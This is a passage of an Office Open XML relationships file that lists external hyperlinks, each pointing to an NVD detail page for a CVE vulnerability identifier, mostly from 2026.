Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48482" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93641" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93642" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93647" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95832" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39353" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42322" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62262" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84458" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89055" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93399" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97063" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97064" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51457" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100520" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100544" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100552" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100575" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100580" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100586" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100587" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100596" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100599" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19804" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61525" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62062" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85542" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89426" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93834" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94445" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96795" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96812" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97527" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97528" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97555" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97957" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98115" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56725" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56733" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84462" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100172" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100176" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47679" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55214" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71483" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100248" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100368" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100369" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56731" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97898" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100551" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100557" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100568" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100588" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100589" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100391" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100567" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67236" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67409" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67410" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97525" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100387" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100389" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100532" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44642" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51773" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92713" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97570" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97573" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97875" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98069" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98070" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98130" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100559" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100561" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100585" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100570" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100597" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79153" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91837" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91838" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91839" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91840" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91841" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97548" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97575" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97576" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97577" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97578" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97579" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97580" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97584" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97594" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97602" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97611" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97612" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97903" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97910" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97911" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97937" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97940" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97941" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97971" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97991" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98002" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98017" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98023" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98052" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98073" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98112" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98116" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98122" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98143" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98156" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49470" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89032" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100578" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100579" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67239" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84893" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100208" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100535" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100541" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100543" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100558" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100560" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10758" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13456" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49850" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50547" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52622" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5267" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53610" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53625" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57443" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67237" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84882" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84884" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85029" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88003" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88421" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89406" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91765" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92550" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92560" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92608" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97523" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97524" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97531" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97536" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97557" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97562" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97583" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97595" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97990" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98050" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98056" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98108" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100390" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98096" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100310" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100530" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93901" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97865" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97871" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97882" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97883" TargetMode="External" Id="rId173" /><Relationship 